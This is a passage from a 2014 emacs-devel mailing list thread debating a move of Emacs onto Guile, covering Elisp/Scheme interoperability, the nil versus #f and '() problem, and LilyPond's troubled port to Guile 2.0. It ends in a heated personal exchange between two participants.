of work needs to be done, but I see no fundamental problems. If some Emacs developers gave Guile-Emacs some love, it might land in a couple years I'd guess, and by then Guile will possibly have some form of just-in-time and/or ahead-of-time native compilation for Elisp as well as Scheme... Taylan ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-17 15:07 ` Taylan Ulrich Bayirli/Kammer @ 2014-09-17 15:33 ` David Kastrup 2014-09-17 20:11 ` Taylan Ulrich Bayirli/Kammer 2014-09-17 17:13 ` Eli Zaretskii 2014-09-17 17:33 ` Stefan Monnier 2 siblings, 1 reply; 404+ messages in thread From: David Kastrup @ 2014-09-17 15:33 UTC (permalink / raw) To: emacs-devel Taylan Ulrich Bayirli/Kammer <taylanbayirli@gmail.com> writes: > Stefan Monnier <monnier@iro.umontreal.ca> writes: > >> Interoperability between languages is *hard*. Doing it so the result >> is lightweight and elegant (and moderately efficient) is rarely >> possible. > > Well, the Elisp and Scheme integration is pretty great. > > Maybe you know all of the following, but for those who didn't: > > - There's no data type conversion because the same object in memory is > the right type in both languages, including procedures/functions. Uh, no? In Lisp, functions are bound to the function cell of a symbol which is different from the value cell of a symbol. In GUILE, nothing is bound to a symbol at all. Modules establish a mapping between symbols and values, and functions do not have separate mappings from values. > - A convenient `import-guile-module' syntax in Elisp could be > implemented relatively trivially, which would walk a module and put > procedure bindings into the function namespace and other bindings into > the variable namespace of Elisp (both with a user-provided prefix). > So you can have the API of any Guile module in Elisp as if it were > just an Elisp library. See? > - There's simply no efficiency issue. After you import something from > the other language, you just have it; it's indistinguishable from > something you defined in the current language, analogous to how C > implemented functions (subrs) are generally indistinguishable from > Elisp implemented functions; they're now all "libguile procedure > objects." That's a misrepresentation since an import does not change the state of a "libguile procedure object" but rather involves the establishing of bindings. The data structures are also not compatible: Lisp lists end with a value that serves as a _false_ boolean, Scheme lists end with a value that serves as a _true_ boolean. > And here some issues, maybe-issues, and non-issues we have: [...] > - The handling of nil vs. Scheme #f and '() is admittedly a wart, but > will probably remain hidden, not causing issues in code you write. I have problems seeing how it can remain hidden. > - Currently Guile's Elisp implementation is buggy and slow in some > things, but this is unrelated to the interoperation of the > languages. If it is unrelated to the interoperation of the languages, this would imply that GUILE itself is buggy and slow. You might want to reconsider that statement. > - Conceptually, Scheme macros can work in Elisp. Might need some work > to actually make this work, or it might be trivial; I don't know. > > - The biggest long-term issue might be that Elisp macros will not work > in Scheme, and this is relevant only to people who want to use Elisp > APIs in Scheme, not affecting Elisp users. Huh, this actually is a surprise to me since defmacro works pretty much the same in GUILE/Scheme as it would in Elisp. > Yes, a lot of work needs to be done, but I see no fundamental > problems. The main problem I see is that Emacs is a large project regarding its code and developer base compared to GUILE and I don't see that GUILE can easily scale up. The priorities of Elispers and Schemers regarding language features and focuses are different, and I don't see overrolling GUILE with the requirements, code, interests, and developers of Emacs going smoothly. > If some Emacs developers gave Guile-Emacs some love, it might land in > a couple years I'd guess, and by then Guile will possibly have some > form of just-in-time and/or ahead-of-time native compilation for Elisp > as well as Scheme... Elisp is not really a special case here since stuff like native compilation would happen at a decidedly lower layer than the Elisp/Scheme distinction. GUILE has a rather impressive number of compiler layers and it is probably only the top layer that would make a difference between Elisp and Scheme while something like the two bottom layers would distinguish between native compilation and bytecode. -- David Kastrup ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-17 15:33 ` David Kastrup @ 2014-09-17 20:11 ` Taylan Ulrich Bayirli/Kammer 2014-09-17 22:42 ` Daniel Colascione 2014-09-18 3:46 ` David Kastrup 0 siblings, 2 replies; 404+ messages in thread From: Taylan Ulrich Bayirli/Kammer @ 2014-09-17 20:11 UTC (permalink / raw) To: David Kastrup; +Cc: emacs-devel David Kastrup <dak@gnu.org> writes: >> - There's no data type conversion because the same object in memory is >> the right type in both languages, including procedures/functions. > > Uh, no? In Lisp, functions are bound to the function cell of a symbol > which is different from the value cell of a symbol. In GUILE, nothing > is bound to a symbol at all. Modules establish a mapping between > symbols and values, and functions do not have separate mappings from > values. I'm not talking about the language-semantic locations of objects, rather that for example the same "physical" object in your RAM is at the same time an Elisp function, and a Scheme procedure. `functionp' and `procedure?' both check for the same data type. (Likewise for other types.) No mutation, packing, serialization/deserialization, or any other things needs to happen to a byte sequence in memory for it to be usable from either language. There's probably a simpler way to word what I have in mind and it's currently escaping me; hope this was clear enough. :) >> - There's simply no efficiency issue. After you import something from >> the other language, you just have it; it's indistinguishable from >> something you defined in the current language, analogous to how C >> implemented functions (subrs) are generally indistinguishable from >> Elisp implemented functions; they're now all "libguile procedure >> objects." > > That's a misrepresentation since an import does not change the state of > a "libguile procedure object" but rather involves the establishing of > bindings. [...] Yes? I'm just saying that once you put a libguile procedure into the function slot of an Elisp symbol, it's indistinguishable from an Elisp function or a subr being in that slot. There is no overhead while calling it. (Elisp functions are compiled into libguile procedures anyway.) Actually, this is just a special-case of the first point, regarding the applicable data type (libguile procedures) being handled in a uniform way without extra overhead in the case it "comes from the other language." >> - The handling of nil vs. Scheme #f and '() is admittedly a wart, but >> will probably remain hidden, not causing issues in code you write. > > I have problems seeing how it can remain hidden. Please mention any concrete problematic cases you can think up. >> - Currently Guile's Elisp implementation is buggy and slow in some >> things, but this is unrelated to the interoperation of the >> languages. > > If it is unrelated to the interoperation of the languages, this would > imply that GUILE itself is buggy and slow. You might want to reconsider > that statement. It implies Guile's Elisp implementation is buggy and slow. That is one unfinished component of Guile. (The main body of the Elisp implementation that powers Guile-Emacs resides within Guile itself; I think some key Emacs data types like buffers and windows are missing if you use it purely from Guile instead of running Guile-Emacs, but you can use it as a general-purpose language.) >> - The biggest long-term issue might be that Elisp macros will not work >> in Scheme, and this is relevant only to people who want to use Elisp >> APIs in Scheme, not affecting Elisp users. > > Huh, this actually is a surprise to me since defmacro works pretty much > the same in GUILE/Scheme as it would in Elisp. The problem is that the Elisp macro will just output, say, the symbol `mapc' into the middle of your Scheme code, where it will not be bound to the Elisp `mapc' function during subsequent compilation. Of course, you can otherwise use defmacro in Scheme, though it's highly discouraged since you have hygienic macros, which guarantee correct bindings. >> Yes, a lot of work needs to be done, but I see no fundamental >> problems. > > The main problem I see is that Emacs is a large project regarding its > code and developer base compared to GUILE and I don't see that GUILE > can easily scale up. Matters such as portability and bug-fixing speed which are related to "manpower" seem open to improvement indeed. I think that would actually be a way in which the Guile-Emacs effort would pay back to Guile. If I'm not mistaken, adopting ECL or some other foreign piece of software would mean that the upstream developers of it aren't guaranteed to cooperate, which could be problematic despite the overall maturity of that piece of software. Guile on the other hand is GNU software; it's the official GNU extension language that's being massively revitalized to be worth of its name. GCC, GDB, and more can be extended in Guile. It's tied with Guix as well; the package manager for the upcoming official GNU distribution. After so many years, things are really getting together in technical terms in the GNU project, and Guile is what's pulling it all together. That's why I'm so interested in Guile myself, and think that Emacs just ought to be a part of this as well. There is some massive potential here for the whole of the GNU system getting a lot more attention, and Emacs itself will benefit from it greatly. One needs to give it time of course, but I think it's the right direction, and is what will be most beneficial to Emacs individually as well in the long term, in case one doesn't care about GNU. And of course, a large portion of the work is already done here. Another option would mean starting from scratch. > The priorities of Elispers and Schemers regarding language features and > focuses are different, and I don't see overrolling GUILE with the > requirements, code, interests, and developers of Emacs going smoothly. The priorities of Elispers seem extremely diverse. People hacked up web servers with Elisp and seem motivated to do crazier things. All the Guile libraries should be welcome. >> If some Emacs developers gave Guile-Emacs some love, it might land in >> a couple years I'd guess, and by then Guile will possibly have some >> form of just-in-time and/or ahead-of-time native compilation for Elisp >> as well as Scheme... > > Elisp is not really a special case here since stuff like native > compilation would happen at a decidedly lower layer than the > Elisp/Scheme distinction. GUILE has a rather impressive number of > compiler layers and it is probably only the top layer that would make > a difference between Elisp and Scheme while something like the two > bottom layers would distinguish between native compilation and > bytecode. Precisely. I just meant to stress out that whatever nifty low-level features Guile will improve on, Elisp, Scheme, and other languages on Guile will benefit from them automatically. Taylan ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-17 20:11 ` Taylan Ulrich Bayirli/Kammer @ 2014-09-17 22:42 ` Daniel Colascione 2014-09-18 2:34 ` Stefan Monnier 2014-09-18 3:17 ` David Kastrup 2014-09-18 3:46 ` David Kastrup 1 sibling, 2 replies; 404+ messages in thread From: Daniel Colascione @ 2014-09-17 22:42 UTC (permalink / raw) To: Taylan Ulrich Bayirli/Kammer, David Kastrup; +Cc: emacs-devel [-- Attachment #1: Type: text/plain, Size: 1306 bytes --] On 09/17/2014 01:11 PM, Taylan Ulrich Bayirli/Kammer wrote: > Actually, this is just a special-case of the first point, regarding the > applicable data type (libguile procedures) being handled in a uniform > way without extra overhead in the case it "comes from the other > language." > >>> - The handling of nil vs. Scheme #f and '() is admittedly a wart, but >>> will probably remain hidden, not causing issues in code you write. >> >> I have problems seeing how it can remain hidden. > > Please mention any concrete problematic cases you can think up. Imagine the round trip a value might take: #f in Scheme to nil in elisp to something back in Scheme. If you alias #f, (), and nil together from an elisp perspective, then when you need to differentiate these values, you can't, because you've just thrown away the information you'd need to do that. You can't make the object's true identity a hidden property of the value either, because that breaks perfectly valid code like this: (defun identity-x (x) (if (eq x nil) nil x)) I'd be happy to use the lower-level portions of Guile for compiling elisp more efficiently, but I'm adamantly against trying to support both Scheme and elisp simultaneously. All in all, I think the effort would be better spent elsewhere. [-- Attachment #2: OpenPGP digital signature --] [-- Type: application/pgp-signature, Size: 819 bytes --] ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-17 22:42 ` Daniel Colascione @ 2014-09-18 2:34 ` Stefan Monnier 2014-09-18 3:17 ` David Kastrup 1 sibling, 0 replies; 404+ messages in thread From: Stefan Monnier @ 2014-09-18 2:34 UTC (permalink / raw) To: Daniel Colascione Cc: Taylan Ulrich Bayirli/Kammer, David Kastrup, emacs-devel > Imagine the round trip a value might take: There's no translation involved, so no "round-trip" problem. Instead the problem is that there are new kinds of data. These can come from Scheme and look weird from the Elisp side. Basically, Scheme has #f, (), and nil as 3 distinct objects. So Guile-Emacs picked one of those as being Elisp's nil, so as long as you stay all within Elisp things work just fine (presumably), but as soon as some Scheme gets into the picture you might get new values which are similar to nil but aren't `eq' to it. > I'd be happy to use the lower-level portions of Guile for compiling > elisp more efficiently, but I'm adamantly against trying to support both > Scheme and elisp simultaneously. I tend to agree. But I'm not sure it's easy to really stay 100% within Elisp with a Guile-VM. E.g. I suspect some errors signals coming from Guile's runtime will end up using Scheme-style data and will end up spilling into the Elisp side if we're not extra careful. Stefan ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-17 22:42 ` Daniel Colascione 2014-09-18 2:34 ` Stefan Monnier @ 2014-09-18 3:17 ` David Kastrup 2014-09-18 9:04 ` Taylan Ulrich Bayirli/Kammer 1 sibling, 1 reply; 404+ messages in thread From: David Kastrup @ 2014-09-18 3:17 UTC (permalink / raw) To: Daniel Colascione; +Cc: Taylan Ulrich Bayirli/Kammer, emacs-devel Daniel Colascione <dancol@dancol.org> writes: > On 09/17/2014 01:11 PM, Taylan Ulrich Bayirli/Kammer wrote: >> Actually, this is just a special-case of the first point, regarding the >> applicable data type (libguile procedures) being handled in a uniform >> way without extra overhead in the case it "comes from the other >> language." >> >>>> - The handling of nil vs. Scheme #f and '() is admittedly a wart, but >>>> will probably remain hidden, not causing issues in code you write. >>> >>> I have problems seeing how it can remain hidden. >> >> Please mention any concrete problematic cases you can think up. > > Imagine the round trip a value might take: #f in Scheme to nil in elisp > to something back in Scheme. It doesn't. See <URL:https://www.gnu.org/software/guile/manual/html_node/Nil.html#Equality-2>. I quote: However, in Elisp, '(), #f, and nil are all equal (though not eq). (defvar f (make-scheme-false)) (defvar eol (make-scheme-null)) (eq f eol) ⇒ nil (eq nil eol) ⇒ nil (eq nil f) ⇒ nil (equal f eol) ⇒ t (equal nil eol) ⇒ t (equal nil f) ⇒ t > If you alias #f, (), and nil together from an elisp perspective, then > when you need to differentiate these values, you can't, because you've > just thrown away the information you'd need to do that. You can't make > the object's true identity a hidden property of the value either, > because that breaks perfectly valid code like this: > > (defun identity-x (x) (if (eq x nil) nil x)) (eq x nil) is just something you are not expected to do if a list or condition may come from a Scheme function. Of course, that includes using x for eq-based hashing. The GUILE manual (in the above-mentioned section) states with audacity Fortunately, using not and null? is in good style, so all well-written standard Scheme programs are correct, in Guile Scheme. Of course, that glosses over the fact that the end of a list may well be implicitly checked for by using sentinels and other quite legitimate programming practices. For example, two proper lists generally have a common tail, even if that tail is only '(), and finding that tail is done by trimming the longer list to the size of the shorter one and then cdr-ing the remaining lists in synch until arriving at a matching value. Using "equal" for that comparison is not an option, and using "eq" is no longer guaranteed to terminate without error. The solution is to declare the algorithm not well-written. Cynicism aside, it will be advisable not to venture into Scheme too much in order to avoid having the Scheme end-of-list and the Scheme #f turn up at all. -- David Kastrup ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-18 3:17 ` David Kastrup @ 2014-09-18 9:04 ` Taylan Ulrich Bayirli/Kammer 2014-09-18 9:27 ` David Kastrup 0 siblings, 1 reply; 404+ messages in thread From: Taylan Ulrich Bayirli/Kammer @ 2014-09-18 9:04 UTC (permalink / raw) To: David Kastrup; +Cc: Daniel Colascione, emacs-devel David Kastrup <dak@gnu.org> writes: > Of course, that glosses over the fact that the end of a list may well > be implicitly checked for by using sentinels and other quite > legitimate programming practices. > > For example, two proper lists generally have a common tail, even if > that tail is only '(), and finding that tail is done by trimming the > longer list to the size of the shorter one and then cdr-ing the > remaining lists in synch until arriving at a matching value. > > Using "equal" for that comparison is not an option, and using "eq" is > no longer guaranteed to terminate without error. The solution is to > declare the algorithm not well-written. So the problem is that two same-length lists are normally guaranteed to have an `eq' element at some point in Lisps, and Guile breaks this guarantee. That seems like a legitimate concern; thanks for bringing it up. Fortunately, making use of this should be relatively rare, and the fix is relatively simple too. (In the algorithm you mentioned, the naive solution is to do an additional (and (null list1-rest) (null list2-rest)) at each cdr instead of only an (eq list1-rest list2-rest), and the smart solution to canonicalize the null objects at the ends during the length calculation/truncation which will inevitably visit the ends of both lists, if the algorithm needs to be as efficient as possible.) Considering also that the issue will only arise during inter-operation of the languages, which should be limited to rare situations like internal Scheme code raising an error that's handled in Elisp, the combined chance of this issue ever hitting a pure Elisp user seems minuscule. All in all, it's not a concern for Emacs users who don't mess with Scheme, and quite a small one for those who do. Taylan ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-18 9:04 ` Taylan Ulrich Bayirli/Kammer @ 2014-09-18 9:27 ` David Kastrup 2014-09-18 11:15 ` Taylan Ulrich Bayirli/Kammer 0 siblings, 1 reply; 404+ messages in thread From: David Kastrup @ 2014-09-18 9:27 UTC (permalink / raw) To: Taylan Ulrich Bayirli/Kammer; +Cc: Daniel Colascione, emacs-devel Taylan Ulrich Bayirli/Kammer <taylanbayirli@gmail.com> writes: > David Kastrup <dak@gnu.org> writes: > >> Of course, that glosses over the fact that the end of a list may well >> be implicitly checked for by using sentinels and other quite >> legitimate programming practices. >> >> For example, two proper lists generally have a common tail, even if >> that tail is only '(), and finding that tail is done by trimming the >> longer list to the size of the shorter one and then cdr-ing the >> remaining lists in synch until arriving at a matching value. >> >> Using "equal" for that comparison is not an option, and using "eq" is >> no longer guaranteed to terminate without error. The solution is to >> declare the algorithm not well-written. > > So the problem is that two same-length lists are normally guaranteed to > have an `eq' element at some point in Lisps, and Guile breaks this > guarantee. That seems like a legitimate concern; thanks for bringing it > up. > > Fortunately, making use of this should be relatively rare, and the fix > is relatively simple too. > > (In the algorithm you mentioned, the naive solution is to do an > additional (and (null list1-rest) (null list2-rest)) at each cdr instead > of only an (eq list1-rest list2-rest), and the smart solution to > canonicalize the null objects at the ends during the length > calculation/truncation which will inevitably visit the ends of both > lists, if the algorithm needs to be as efficient as possible.) Well, as I said: the solution is to declare the algorithm not well-written. > Considering also that the issue will only arise during inter-operation > of the languages, which should be limited to rare situations like > internal Scheme code raising an error that's handled in Elisp, the > combined chance of this issue ever hitting a pure Elisp user seems > minuscule. That is under the premise that Emacs will not be extended in _any_ language except Elisp. So that leaves us with one of two conclusions: the advertisement of ultimately being able to extend Emacs in multiple languages possibly including Scheme, JavaScript and Lua is not going anywhere, or existing Elisp code will generally need to be revised in order to work in an Emacs running extensions written in other languages. For example, GUILE prouds itself of including an LALR(1) parser generator running native Scheme code. Using it for semantic parsing in Emacs will not be feasible if its "Scheme data model" is incompatible with the "Elisp data model". > All in all, it's not a concern for Emacs users who don't mess with > Scheme, and quite a small one for those who do. But the whole point of the exercise was to enable messing with Scheme. -- David Kastrup ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-18 9:27 ` David Kastrup @ 2014-09-18 11:15 ` Taylan Ulrich Bayirli/Kammer 0 siblings, 0 replies; 404+ messages in thread From: Taylan Ulrich Bayirli/Kammer @ 2014-09-18 11:15 UTC (permalink / raw) To: David Kastrup; +Cc: Daniel Colascione, emacs-devel David Kastrup <dak@gnu.org> writes: > Well, as I said: the solution is to declare the algorithm not > well-written. Yes, this relatively rare algorithm with a trivially modified well-written (for Guile) variant is considered not-well-written. > That is under the premise that Emacs will not be extended in _any_ > language except Elisp. > > So that leaves us with one of two conclusions: the advertisement of > ultimately being able to extend Emacs in multiple languages possibly > including Scheme, JavaScript and Lua is not going anywhere, or existing > Elisp code will generally need to be revised in order to work in an > Emacs running extensions written in other languages. Note that I myself haven't shown much enthusiasm towards the idea of using any non-Elisp languages, other than Scheme, and I don't intend to force Scheme on anyone either. Nobody does. Probably, sooner or later the amount of Scheme extensions for Emacs will grow. Core Emacs need not support these if they really lead to problems, but I suspect that will be an exceedingly rare situation. Emacs users who use others' Scheme extensions might have to deal with issues in them, but that in turn is a problem with said extensions; an Elisp extension can also have any number of limitations or warts imposed on the user, by say using defadvice or failing to follow some conventions. > For example, GUILE prouds itself of including an LALR(1) parser > generator running native Scheme code. Using it for semantic parsing > in Emacs will not be feasible if its "Scheme data model" is > incompatible with the "Elisp data model". I would expect it to use neither an Elisp nor a Scheme data model, but a language-independent one served to you in the form of procedures and macros working on said model. Taking a quick peek into the source, that seems to be the case indeed; it uses `define-record-type'. And if it did use one of the usual Elisp or Scheme types (not a disjoint type created with `define-record-type'), then they would still be uniform between the languages as I previously mentioned: an Elisp vector is a Scheme vector, an Elisp cons is a Scheme pair, etc. The one and only wart is removing the "lists all end with the same object" guarantee as mentioned previously, which will rarely be an issue and has a trivial fix. > But the whole point of the exercise was to enable messing with Scheme. No, it was not. For Emacsers, the benefits will be, in decreasing order of "immediate benefit": 1) make Elisp perform better, 2) make Guile libraries available to Elisp regardless of the language they're implemented in, 3) make it possible to extend Emacs in Scheme. Lists are used gratiously in Emacs/Elisp, but not as central types in specific-purpose Guile libraries, so the nil vs. '() problem mainly hits point 3, and point 2 to a lesser extent. (And then the whole "problem" is barely limited to "lists not guaranteed to terminate in the same (as in eq) object anymore," on which code relying should be exceedingly rare.) To repeat: I see no fundamental issues in basing Emacs/Elisp on Guile. There are practical issues only, like how to fix string representation. It would be great if we started working on them. :-) Taylan ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-17 20:11 ` Taylan Ulrich Bayirli/Kammer 2014-09-17 22:42 ` Daniel Colascione @ 2014-09-18 3:46 ` David Kastrup 2014-09-18 9:53 ` Taylan Ulrich Bayirli/Kammer 1 sibling, 1 reply; 404+ messages in thread From: David Kastrup @ 2014-09-18 3:46 UTC (permalink / raw) To: emacs-devel Taylan Ulrich Bayirli/Kammer <taylanbayirli@gmail.com> writes: > Guile on the other hand is GNU software; it's the official GNU > extension language that's being massively revitalized to be worth of > its name. GCC, GDB, and more can be extended in Guile. It's tied > with Guix as well; the package manager for the upcoming official GNU > distribution. After so many years, things are really getting together > in technical terms in the GNU project, and Guile is what's pulling it > all together. The music typesetter GNU LilyPond is one of the oldest GNU projects using GUILE. So far, its attempts to port from GUILE 1.8 to GUILE 2.0 have crashed and burnt (current state is inexplicable scoping problems and crashes in random locations). As a consequence, it will get removed from Debian next February when Debian discontinues support of GUILE 1.8. LilyPond's lead developer (yours truly) has been banned from posting on the GUILE developer list years ago. There have been few private offers from GUILE developers to help with the porting, but after being provided the necessary information, the contacts have gone dead. LilyPond is the only GUILE-based GNU project that I know of that integrates Scheme as tightly into the basic system and language as it would be expected from Emacs, defining dozens of native data types in C++. And it does not even have the Elisp/Scheme discrepancy to deal with. It is an actively maintained project with dozens of developers and thousands of users and will disappear from Debian-based distributions next year. If Emacs developers would happen to fall from grace and/or the GUILE developers get tired of dealing with the expectable host of problems and just stop answering calls because of the initial enthusiasm wearing down under a lack of man power, I don't see what would promise a substantially different ending there. -- David Kastrup ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-18 3:46 ` David Kastrup @ 2014-09-18 9:53 ` Taylan Ulrich Bayirli/Kammer 2014-09-18 10:09 ` David Kastrup 0 siblings, 1 reply; 404+ messages in thread From: Taylan Ulrich Bayirli/Kammer @ 2014-09-18 9:53 UTC (permalink / raw) To: David Kastrup; +Cc: emacs-devel David Kastrup <dak@gnu.org> writes: > The music typesetter GNU LilyPond is one of the oldest GNU projects > using GUILE. So far, its attempts to port from GUILE 1.8 to GUILE 2.0 > have crashed and burnt (current state is inexplicable scoping problems > and crashes in random locations). As a consequence, it will get removed > from Debian next February when Debian discontinues support of GUILE 1.8. > LilyPond's lead developer (yours truly) has been banned from posting on > the GUILE developer list years ago. There have been few private offers > from GUILE developers to help with the porting, but after being provided > the necessary information, the contacts have gone dead. > > LilyPond is the only GUILE-based GNU project that I know of that > integrates Scheme as tightly into the basic system and language as it > would be expected from Emacs, defining dozens of native data types in > C++. And it does not even have the Elisp/Scheme discrepancy to deal > with. > > It is an actively maintained project with dozens of developers and > thousands of users and will disappear from Debian-based distributions > next year. > > If Emacs developers would happen to fall from grace and/or the GUILE > developers get tired of dealing with the expectable host of problems and > just stop answering calls because of the initial enthusiasm wearing down > under a lack of man power, I don't see what would promise a > substantially different ending there. It's unfortunate that LilyPond was hit by the 2.0 overhaul so badly. Fortunately, such an overhaul is very unlikely to ever happen again. And even in the fringe case that it does, it would not affect Elisp as much (or at all) in the way the 2.0 overhaul affected Scheme. Taylan ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-18 9:53 ` Taylan Ulrich Bayirli/Kammer @ 2014-09-18 10:09 ` David Kastrup 2014-09-18 11:29 ` Taylan Ulrich Bayirli/Kammer 0 siblings, 1 reply; 404+ messages in thread From: David Kastrup @ 2014-09-18 10:09 UTC (permalink / raw) To: Taylan Ulrich Bayirli/Kammer; +Cc: emacs-devel Taylan Ulrich Bayirli/Kammer <taylanbayirli@gmail.com> writes: > David Kastrup <dak@gnu.org> writes: > >> The music typesetter GNU LilyPond is one of the oldest GNU projects >> using GUILE. So far, its attempts to port from GUILE 1.8 to GUILE 2.0 >> have crashed and burnt (current state is inexplicable scoping problems >> and crashes in random locations). As a consequence, it will get removed >> from Debian next February when Debian discontinues support of GUILE 1.8. >> LilyPond's lead developer (yours truly) has been banned from posting on >> the GUILE developer list years ago. There have been few private offers >> from GUILE developers to help with the porting, but after being provided >> the necessary information, the contacts have gone dead. >> >> LilyPond is the only GUILE-based GNU project that I know of that >> integrates Scheme as tightly into the basic system and language as it >> would be expected from Emacs, defining dozens of native data types in >> C++. And it does not even have the Elisp/Scheme discrepancy to deal >> with. >> >> It is an actively maintained project with dozens of developers and >> thousands of users and will disappear from Debian-based distributions >> next year. >> >> If Emacs developers would happen to fall from grace and/or the GUILE >> developers get tired of dealing with the expectable host of problems and >> just stop answering calls because of the initial enthusiasm wearing down >> under a lack of man power, I don't see what would promise a >> substantially different ending there. > > It's unfortunate that LilyPond was hit by the 2.0 overhaul so badly. > > Fortunately, such an overhaul is very unlikely to ever happen again. I think you are misunderstanding the problem. The problem is not that technical problems occured after large changes. The problem is that GUILE developers cannot be bothered with the fallout in affected projects. LilyPond is not a fringe project. It is by far the largest GNU project using GUILE. > And even in the fringe case that it does, it would not affect Elisp as > much (or at all) in the way the 2.0 overhaul affected Scheme. GUILE development will cater better for Elisp than for Scheme? That does sound peculiar. Is this pitch being made anywhere else apart from the Emacs developer list? -- David Kastrup ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-18 10:09 ` David Kastrup @ 2014-09-18 11:29 ` Taylan Ulrich Bayirli/Kammer 2014-09-18 12:07 ` David Kastrup 0 siblings, 1 reply; 404+ messages in thread From: Taylan Ulrich Bayirli/Kammer @ 2014-09-18 11:29 UTC (permalink / raw) To: David Kastrup; +Cc: emacs-devel David Kastrup <dak@gnu.org> writes: > I think you are misunderstanding the problem. The problem is not that > technical problems occured after large changes. The problem is that > GUILE developers cannot be bothered with the fallout in affected > projects. I don't mean to insult but I have the impression that, what the Guile developers could not be bothered with might have been the LilyPond maintainer rather than LilyPond itself. > GUILE development will cater better for Elisp than for Scheme? That > does sound peculiar. Is this pitch being made anywhere else apart from > the Emacs developer list? Guile has authority over Guile-Scheme, but not over Elisp; it has to and will support Elisp as defined by Emacs as much as possible. That's pretty obvious I'd say. If the Emacs/Guile merge became fully complete in several years and all remnants of non-Guile Emacs disappeared, then it could be vaguely imaginable that Guile took control over Elisp semantics, but that "ain't gonna happen" under such Emacs community pressure. :-) You can bet on Guile taking Elisp only to where Elispers want it to go. Taylan ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-18 11:29 ` Taylan Ulrich Bayirli/Kammer @ 2014-09-18 12:07 ` David Kastrup 2014-09-18 14:12 ` Taylan Ulrich Bayirli/Kammer 0 siblings, 1 reply; 404+ messages in thread From: David Kastrup @ 2014-09-18 12:07 UTC (permalink / raw) To: Taylan Ulrich Bayirli/Kammer; +Cc: emacs-devel Taylan Ulrich Bayirli/Kammer <taylanbayirli@gmail.com> writes: > David Kastrup <dak@gnu.org> writes: > >> I think you are misunderstanding the problem. The problem is not that >> technical problems occured after large changes. The problem is that >> GUILE developers cannot be bothered with the fallout in affected >> projects. > > I don't mean to insult but I have the impression that, what the Guile > developers could not be bothered with might have been the LilyPond > maintainer rather than LilyPond itself. Shrug. Naturally, after Andy Wingo prohibited me from bothering the Guile developer list any more, the number of contacts went down. I sent several major developers who had _after_ the interdictum offered to help the respective information about the state of the GUILE 2.0 port and how to check out and work with LilyPond. None of them ever got back to me. At any rate, it has been mentioned previously in this discussion that the Emacs developer list is not always considered a happy-go-lucky environment. So if it is the habit of GUILE developers to take out revenge on a project and its users for enmity with single developers, that's also relevant for making crucial GNU software depend on GUILE. I think this interpretation of events is not making for a much better outlook. Particularly because Emacs development is more often than other GNU projects governed by unpopular political decisions. A habit of retaliation and "see-where-this-will-get-you" in order to pressure for a change in project lead is not likely going to work out well. I don't think that you are better off selling this situation as a personal vendetta, and it is not like the GUILE 2 problem was not already there when I started to get involved with LilyPond. >> GUILE development will cater better for Elisp than for Scheme? That >> does sound peculiar. Is this pitch being made anywhere else apart >> from the Emacs developer list? > > Guile has authority over Guile-Scheme, but not over Elisp; it has to > and will support Elisp as defined by Emacs as much as possible. > That's pretty obvious I'd say. "This is not possible" will be defined under the constraints of GUILE remaining Scheme according to GUILE's vision of interpretating the Scheme standard and its further evolution. > If the Emacs/Guile merge became fully complete in several years and > all remnants of non-Guile Emacs disappeared, then it could be vaguely > imaginable that Guile took control over Elisp semantics, but that > "ain't gonna happen" under such Emacs community pressure. :-) You can > bet on Guile taking Elisp only to where Elispers want it to go. The question now is not where GUILE will take Elisp but rather whether its interpretation of Elisp can get close enough to make a switch feasible in the first place. -- David Kastrup ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-18 12:07 ` David Kastrup @ 2014-09-18 14:12 ` Taylan Ulrich Bayirli/Kammer 2014-09-18 14:56 ` David Kastrup 0 siblings, 1 reply; 404+ messages in thread From: Taylan Ulrich Bayirli/Kammer @ 2014-09-18 14:12 UTC (permalink / raw) To: David Kastrup; +Cc: emacs-devel David Kastrup <dak@gnu.org> writes: > At any rate, it has been mentioned previously in this discussion that > the Emacs developer list is not always considered a happy-go-lucky > environment. So if it is the habit of GUILE developers to take out > revenge on a project and its users for enmity with single developers, > that's also relevant for making crucial GNU software depend on GUILE. I don't see the Guile developers taking revenge on anyone --especially not LilyPond as a whole-- but rather flaying off your efforts to take revenge on them by passing on your anger. No need to be happy-go-lucky, just less insulting. You could probably continue taking part on guile-devel if you were more cooperative. > I think this interpretation of events is not making for a much better > outlook. Particularly because Emacs development is more often than > other GNU projects governed by unpopular political decisions. A habit > of retaliation and "see-where-this-will-get-you" in order to pressure > for a change in project lead is not likely going to work out well. It's ironic that you would talk about retaliation and "see-where-this-will-get-you" behavior, or am I misunderstanding? :-) It feels more like that's your attitude, despite there being no pressure from the Guile side. > I don't think that you are better off selling this situation as a > personal vendetta, and it is not like the GUILE 2 problem was not > already there when I started to get involved with LilyPond. Let's be honest here, it was obvious from your first mail on this thread that there's something personal going on. I knew absolutely nothing about your history on guile-devel (did not even recognize your name), yet guessed immediately that there was something fishy. >> Guile has authority over Guile-Scheme, but not over Elisp; it has to >> and will support Elisp as defined by Emacs as much as possible. >> That's pretty obvious I'd say. > > "This is not possible" will be defined under the constraints of GUILE > remaining Scheme according to GUILE's vision of interpretating the > Scheme standard and its further evolution. Reminder that Guile-Emacs, in its current alpha state, already runs ERC, Gnus, rcirc, Dired, term, comint, TRAMP, c-mode, etc. There will definitely not be much that is impossible. > The question now is not where GUILE will take Elisp but rather whether > its interpretation of Elisp can get close enough to make a switch > feasible in the first place. See above. Also, compilation, 